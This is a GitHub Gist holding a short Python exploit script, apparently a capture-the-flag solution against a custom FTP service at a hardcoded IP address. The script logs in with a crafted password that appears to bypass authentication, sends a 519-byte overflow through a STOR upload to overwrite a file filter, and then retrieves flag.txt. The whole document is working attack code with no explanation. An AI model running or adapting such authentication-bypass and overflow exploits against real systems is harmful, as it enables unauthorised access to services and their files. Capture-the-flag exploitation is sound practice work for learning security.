Created
September 21, 2015 02:38
-
-
Save peternguyen93/23fd065e4ce0afb9f242 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from Pwn import * | |
| # p = Pwn(mode=1,port=12012) | |
| p = Pwn(mode=1,host='54.175.183.202',port=12012) | |
| username = 'blankwall' | |
| password = ';rpywx~YYYBBBBB~:::::::=KP`' | |
| def login(user,passwd): | |
| p.write('USER ' + user + '\n') | |
| p.read_until('Please send password for user blankwall\n') | |
| p.write('PASS ' + passwd) | |
| p.read_until('logged in') | |
| def stor(): | |
| p.write('PASV\n') | |
| d = p.recv(1024) | |
| _port = d.replace('PASV succesful listening on port:','').strip(' \n') | |
| p.write('STOR\n') | |
| c1 = Pwn(host='54.175.183.202',port=int(_port)) | |
| c1.connect() | |
| c1.write('A'*519 + '\n') | |
| c1.close() | |
| p.recv(1024) | |
| p.recv(1024) | |
| def getflag(): | |
| p.write('PASV\n') | |
| d = p.recv(1024) | |
| _port = d.replace('PASV succesful listening on port:','').strip(' \n') | |
| p.write('RETR flag.txt\n') | |
| c1 = Pwn(host='54.175.183.202',port=int(_port)) | |
| c1.connect() | |
| print c1.recv(1024) | |
| c1.close() | |
| def exploit(): | |
| p.connect() | |
| login(username,password) | |
| print 'Overwrite filter' | |
| stor() | |
| print 'Get flag' | |
| getflag() | |
| exploit() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment